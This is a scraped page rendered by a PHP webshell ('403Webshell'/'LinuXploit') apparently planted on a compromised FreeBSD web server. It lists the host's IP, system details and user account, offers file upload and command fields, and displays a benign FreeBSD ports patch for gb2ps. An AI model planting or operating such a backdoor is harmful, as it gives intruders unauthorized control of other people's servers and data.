403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/chinese/gb2ps/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/chinese/gb2ps/files/patch-gbinit.c
--- gbinit.c.orig	1992-08-23 11:37:58.000000000 +0800
+++ gbinit.c	2013-09-26 21:00:49.000000000 +0800
@@ -98,11 +98,12 @@ char **arglist;
 	exit (1);
   }
 
-  if (*pathname==0)
+  if (*pathname==0) {
   	if (getenv("CFONT")!=NULL)
  		strcpy(pathname,getenv("CFONT"));
 	else
     		strcpy (pathname,CFONT);
+  }
 
  strcpy(cfont_name,pathname); strcat(cfont_name,SONGTI); 
  if ((cfont = fopen (cfont_name, "r"))!=NULL) {
@@ -185,7 +186,7 @@ char **arglist;
   return k;
 }
 
-
+void
 cleanup(i)
 int i;
 {
@@ -201,5 +202,3 @@ int i;
   if (cfont!=CHFONT[4].fp) fclose(CHFONT[4].fp);
   if (cfont!=CHFONT[5].fp) fclose(CHFONT[5].fp);
 }
-
-

Youez - 2016 - github.com/yon3zu
LinuXploit